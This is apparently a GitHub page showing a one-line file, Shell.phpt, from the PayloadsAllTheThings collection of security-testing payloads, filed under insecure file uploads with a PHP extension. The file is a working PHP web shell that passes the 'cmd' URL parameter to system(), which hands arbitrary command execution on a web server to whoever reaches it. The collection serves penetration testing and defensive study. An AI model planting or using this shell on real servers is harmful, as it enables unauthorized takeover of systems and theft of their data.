PayloadsAllTheThings/Upload insecure files/PHP Extension/Shell.phpt

1 line
43 B
Plaintext
Raw Normal View History

<?php echo "Shell";system($_GET['cmd']); ?>